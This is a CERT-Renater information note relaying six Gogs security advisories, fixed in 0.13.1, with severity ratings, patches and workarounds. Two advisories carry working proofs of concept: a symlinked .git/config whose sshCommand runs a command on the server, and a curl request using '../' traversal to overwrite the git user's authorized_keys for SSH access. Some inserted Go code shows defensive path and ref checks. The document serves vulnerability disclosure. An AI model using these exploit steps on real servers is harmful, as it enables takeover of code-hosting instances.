
======================================================================

                               CERT-Renater

                    Information Note No. 2024/VULN562
_____________________________________________________________________

DATE                : 27/12/2024

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Gogs versions prior to 0.13.1.

=====================================================================
https://github.com/gogs/gogs/security/advisories/GHSA-r7j8-5h9c-f6fx
https://github.com/gogs/gogs/security/advisories/GHSA-qf5v-rp47-55gg
https://github.com/gogs/gogs/security/advisories/GHSA-vm62-9jw3-c8w3
https://github.com/gogs/gogs/security/advisories/GHSA-ccqv-43vm-4f3w
https://github.com/gogs/gogs/security/advisories/GHSA-9pp6-wq8c-3w2c
https://github.com/gogs/gogs/security/advisories/GHSA-m27m-h5gj-wwmg
_____________________________________________________________________

Path Traversal in file editing UI
Critical
unknwon published GHSA-r7j8-5h9c-f6fx Dec 23, 2024
Package
Gogs (Go)

Affected versions
<0.13.1

Patched versions
0.13.1


Description

Impact

A malicious user can commit and then edit a crafted symlink file in a
repository to gain SSH access to the server.

Patches

Editing symlink while changing the file name has been prohibited
via the repository web editor (#7857). Users should upgrade to 0.13.1
or the latest 0.14.0+dev.

Workarounds

No viable workaround is available; on affected versions, grant access
to your Gogs instance only to trusted users.


References
n/a


Proof of Concept

    Create two repositories, upload something to the first
repository, edit any file, and save it on the webpage.

    In the second repository, create a symbolic link to the file
you need to edit:

    $ ln -s /data/gogs/data/tmp/local-repo/1/.git/config test
    $ ls -la
    total 8
    drwxr-xr-x   5 dd  staff  160 Oct 27 19:09 .
    drwxr-xr-x   4 dd  staff  128 Oct 27 19:06 ..
    drwxr-xr-x  12 dd  staff  384 Oct 27 19:09 .git
    -rw-r--r--   1 dd  staff   12 Oct 27 19:06 README.md
    lrwxr-xr-x   1 dd  staff   44 Oct 27 19:09 test -> /data/gogs/data/tmp/local-repo/1/.git/config
    $ git add .
    $ git commit -m 'ddd'
    $ git push -f

    Go back to the webpage, edit the symlink file in the second
repository, replace its content with the following, change the
filename, and save (note that once the filename is changed, the
restriction on editing symlink files is bypassed):

    [core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = echo pwnned > /tmp/poc
    [remote "origin"]
    url = git@github.com:torvalds/linux.git
    fetch = +refs/heads/*:refs/remotes/origin/*
    [branch "master"]
    remote = origin
    merge = refs/heads/master

    Go back to the first repository, edit something, and commit again;
a file called /tmp/poc is then created on the server.

For more information

If you have any questions or comments about this advisory, please
post on #7582.


Severity
Critical

CVE ID
CVE-2024-54148

Weaknesses
CWE-20

Credits

    @ManassehZhou ManassehZhou Reporter

_____________________________________________________________________


Path Traversal in file update API
Critical
unknwon published GHSA-qf5v-rp47-55gg Dec 23, 2024
Package
gogs.io/gogs (Go)

Affected versions
<0.13.1

Patched versions
0.13.1

Description

Impact

A malicious user can write a file to an arbitrary path on the server
and thereby gain SSH access to it.

Patches

Writing files outside repository Git directory has been prohibited
via the repository file update API (#7859). Users should upgrade
to 0.13.1 or the latest 0.14.0+dev.


Workarounds

No viable workaround is available; on affected versions, grant access
to your Gogs instance only to trusted users.

References

n/a
Proof of Concept

    Generate a Personal Access Token.

    Edit any file on the server with this request:

    curl -v --path-as-is -X PUT --url "http://localhost:10880/api/v1/repos/Test/bbcc/contents/../../../../../../../../home/git/.ssh/authorized_keys" \
    -H "Authorization: token eaac23cf58fc76bbaecd686ec52cd44d903db9bf" \
    -H "Content-Type: application/json" \
    --data '{
      "message": "an",
      "content": "<base64encoded: your ssh pub key>"
    }'

    Connect to the remote server over SSH:

    ssh -i temp git@localhost -p 10022


For more information


If you have any questions or comments about this advisory,
please post on #7582.

Severity
Critical

CVE ID
CVE-2024-55947

Weaknesses
CWE-20

Credits

    @ManassehZhou ManassehZhou Reporter

_____________________________________________________________________


Argument Injection in the built-in SSH server
Critical
unknwon published GHSA-vm62-9jw3-c8w3 Dec 23, 2024
Package
gogs.io/gogs (Go)

Affected versions
<=0.13.0

Patched versions
0.13.1

Description

Impact

When the built-in SSH server is enabled
([server] START_SSH_SERVER = true), unprivileged user accounts
with at least one SSH key can execute arbitrary commands on the
Gogs instance with the privileges of the user specified by
RUN_USER in the configuration. This allows attackers to access and
alter any user's code hosted on the same instance.


Patches

The env command sent to the internal SSH server has been changed to
be a passthrough (#7868), i.e. the feature is effectively removed.
Users should upgrade to 0.13.1 or the latest 0.14.0+dev.

Workarounds

Disable the built-in SSH server on operating systems other than
Windows.


References

https://www.cve.org/CVERecord?id=CVE-2024-39930

Severity
Critical

10.0 / 10

CVSS v3 base metrics

Attack vector
Network

Attack complexity
Low

Privileges required
Low

User interaction
None

Scope
Changed

Confidentiality
High

Integrity
High

Availability
High

CVSS:3.1/AC:L/AV:N/A:H/C:H/I:H/PR:L/S:C/UI:N

CVE ID
CVE-2024-39930

Weaknesses
CWE-20

Credits

    @swapgs swapgs Reporter



_____________________________________________________________________


Deletion of internal files
Critical
unknwon published GHSA-ccqv-43vm-4f3w Dec 23, 2024

Package
gogs.io/gogs (Go)

Affected versions
<=0.13.0

Patched versions
0.13.1


Description

Impact

Unprivileged user accounts can execute arbitrary commands on the Gogs
instance with the privileges of the account specified by RUN_USER in
the configuration. This allows attackers to access and alter any
user's code hosted on the same instance.


Patches

Deletion of .git files has been prohibited (#7870). Users should
upgrade to 0.13.1 or the latest 0.14.0+dev.
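The fixes in this advisory and in the two path traversal advisories above (#7857, #7859 and #7870) come down to one rule: a client-supplied path must stay inside the repository working tree, both lexically and after symlink resolution, and must never reach a .git entry. The Go function below is an added illustration for this note, not code from Gogs; SafeRepoPath, inside, resolveExisting and ErrOutsideRepo are names chosen here, and it assumes the repository root already exists on disk.

```go
package main

import (
	"errors"
	"os"
	"path/filepath"
)

var ErrOutsideRepo = errors.New("path escapes repository working tree or touches .git")
// inside reports whether candidate lies under root (both cleaned, same base) with no ".." or ".git" component.
func inside(root, candidate string) bool {
	rel, err := filepath.Rel(root, candidate)
	for d := rel; err == nil && d != "."; d = filepath.Dir(d) {
		if b := filepath.Base(d); b == ".." || b == ".git" {
			return false
		}
	}
	return err == nil
}

// resolveExisting follows symlinks on the longest existing prefix of p and refuses dangling links.
func resolveExisting(p string) (string, error) {
	for {
		if r, err := filepath.EvalSymlinks(p); err == nil {
			return r, nil
		} else if fi, lerr := os.Lstat(p); !errors.Is(err, os.ErrNotExist) || (lerr == nil && fi.Mode()&os.ModeSymlink != 0) {
			return "", ErrOutsideRepo // unexpected error, or a link whose target is missing
		} else if parent := filepath.Dir(p); parent == p {
			return "", err
		} else {
			p = parent
		}
	}
}

// SafeRepoPath (hypothetical helper, not Gogs code) maps a client-supplied path to an on-disk path,
// accepting it only if it stays inside repoRoot lexically and after resolving any existing symlink.
func SafeRepoPath(repoRoot, userPath string) (string, error) {
	root, err := filepath.EvalSymlinks(repoRoot) // symlink-free root to compare against
	if err != nil || userPath == "" || filepath.IsAbs(userPath) {
		return "", ErrOutsideRepo
	}
	full := filepath.Join(root, userPath) // Join cleans "../" segments lexically
	if !inside(root, full) {
		return "", ErrOutsideRepo
	}
	if resolved, err := resolveExisting(full); err != nil || !inside(root, resolved) {
		return "", ErrOutsideRepo
	}
	return full, nil
}
```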


Workarounds

No viable workaround is available; on affected versions, grant access
to your Gogs instance only to trusted users.


References

https://www.cve.org/CVERecord?id=CVE-2024-39931


Severity
Critical

10.0 / 10

CVSS v3 base metrics

Attack vector
Network

Attack complexity
Low

Privileges required
Low

User interaction
None

Scope
Changed

Confidentiality
High

Integrity
High

Availability
High

CVSS:3.1/AC:L/AV:N/A:H/C:H/I:H/PR:L/S:C/UI:N

CVE ID
CVE-2024-39931

Weaknesses
CWE-20

Credits

    @swapgs swapgs Reporter

_____________________________________________________________________


Argument Injection during changes preview
Critical
unknwon published GHSA-9pp6-wq8c-3w2c Dec 23, 2024
Package
gogs.io/gogs (Go)

Affected versions
<=0.13.0

Patched versions
0.13.1


Description

Impact

Unprivileged user accounts can write to arbitrary files on the
filesystem. We could demonstrate its exploitation to force a
re-installation of the instance, granting administrator rights.
It allows accessing and altering any user's code hosted on the
same instance.


Patches

Unintended Git options are now ignored for the diff preview (#7871).
Users should upgrade to 0.13.1 or the latest 0.14.0+dev.

Workarounds

No viable workaround is available; on affected versions, grant access
to your Gogs instance only to trusted users.


References

https://www.cve.org/CVERecord?id=CVE-2024-39932

Severity
Critical

10.0 / 10

CVSS v3 base metrics

Attack vector
Network

Attack complexity
Low

Privileges required
Low

User interaction
None

Scope
Changed

Confidentiality
High

Integrity
High

Availability
High

CVSS:3.1/AC:L/AV:N/A:H/C:H/I:H/PR:L/S:C/UI:N

CVE ID
CVE-2024-39932

Weaknesses
CWE-20

Credits

    @swapgs swapgs Reporter

_____________________________________________________________________


Argument Injection when tagging new releases
High
unknwon published GHSA-m27m-h5gj-wwmg Dec 23, 2024

Package
gogs.io/gogs (Go)

Affected versions
<=0.13.0

Patched versions
0.13.1


Description

Impact

Unprivileged user accounts with at least one SSH key can read
arbitrary files on the system. For instance, they could leak the
configuration files that could contain database credentials
([database] *) and [security] SECRET_KEY. Attackers could also
exfiltrate TLS certificates, other users' repositories, and the
Gogs database when the SQLite driver is enabled.


Patches

Unintended Git options are now ignored when creating tags (#7872).
Users should upgrade to 0.13.1 or the latest 0.14.0+dev.
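The diff-preview fix above (#7871) and this tag-creation fix (#7872) both stop a user-chosen ref or commit name from reaching Git in a position where it could be read as an option. The Go functions below are an added illustration for this note, not Gogs code; CheckRef, TagArgs, DiffArgs and ErrUnsafeRef are names chosen here, and the --end-of-options marker assumes Git 2.24 or later.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

var ErrUnsafeRef = errors.New("user-supplied Git argument rejected")

// CheckRef accepts a conservative subset of Git ref names. The first rule is the one that
// matters for argument injection: a value beginning with "-" would be parsed by Git as an
// option rather than as a tag or commit name.
func CheckRef(v string) error {
	switch {
	case v == "", strings.HasPrefix(v, "-"):
		return fmt.Errorf("%w: option-like value %q", ErrUnsafeRef, v)
	case strings.Contains(v, ".."), strings.HasSuffix(v, ".lock"), strings.HasSuffix(v, "/"):
		return fmt.Errorf("%w: %q is not a valid ref name", ErrUnsafeRef, v)
	}
	for _, r := range v {
		// git check-ref-format also forbids control characters, space and this punctuation
		if r < 0x20 || r == 0x7f || strings.ContainsRune(" ~^:?*[\\", r) {
			return fmt.Errorf("%w: %q contains %q", ErrUnsafeRef, v, r)
		}
	}
	return nil
}

// TagArgs builds the argv (without the leading "git") for creating an annotated tag from
// request fields. Fixed options come first; "--end-of-options" (Git 2.24+) makes Git treat
// everything after it as an operand even if CheckRef were ever relaxed.
func TagArgs(tag, target, message string) ([]string, error) {
	for _, v := range []string{tag, target} {
		if err := CheckRef(v); err != nil {
			return nil, err
		}
	}
	return []string{"tag", "-a", "-m", message, "--end-of-options", tag, target}, nil
}

// DiffArgs builds the argv for a changes preview between two user-selected commits. A bare
// "--" would not do here: after "--", git diff reads the remaining words as pathspecs.
func DiffArgs(base, head string) ([]string, error) {
	for _, v := range []string{base, head} {
		if err := CheckRef(v); err != nil {
			return nil, err
		}
	}
	return []string{"diff", "--end-of-options", base, head}, nil
}
```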


Workarounds

No viable workaround is available; on affected versions, grant access
to your Gogs instance only to trusted users.


References

https://www.cve.org/CVERecord?id=CVE-2024-39933

Severity
High

10.0 / 10

CVSS v3 base metrics

Attack vector
Network

Attack complexity
Low

Privileges required
Low

User interaction
None

Scope
Changed

Confidentiality
High

Integrity
None

Availability
None

CVSS:3.1/AC:L/AV:N/A:N/C:H/I:N/PR:L/S:C/UI:N

CVE ID
CVE-2024-39933

Weaknesses
CWE-20

Credits

    @swapgs swapgs Reporter




=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================
